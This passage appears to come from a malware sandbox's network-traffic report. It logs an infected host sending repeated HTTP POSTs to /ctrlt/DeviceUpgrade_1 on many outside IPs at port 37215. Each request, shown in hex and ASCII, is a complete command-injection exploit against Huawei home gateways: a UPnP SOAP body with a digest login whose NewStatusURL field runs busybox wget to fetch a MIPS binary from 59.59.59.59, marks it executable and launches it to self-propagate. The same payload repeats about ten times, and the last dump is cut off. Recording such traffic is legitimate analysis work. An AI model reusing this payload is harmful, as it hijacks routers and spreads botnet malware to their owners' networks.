                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1368192.168.2.154917662.220.241.12037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836550951 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1369192.168.2.1536654157.105.13.25337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836570978 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1370192.168.2.153712841.9.104.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836627007 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1371192.168.2.1545732157.198.74.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836642027 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1372192.168.2.154430041.130.116.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836656094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1373192.168.2.1537406157.24.185.6437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836772919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1374192.168.2.1535596157.98.172.8437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836935043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1375192.168.2.1535458157.75.201.11137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836952925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1376192.168.2.1559074197.64.10.4637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836968899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1377192.168.2.153606841.184.29.11437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:04.836986065 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 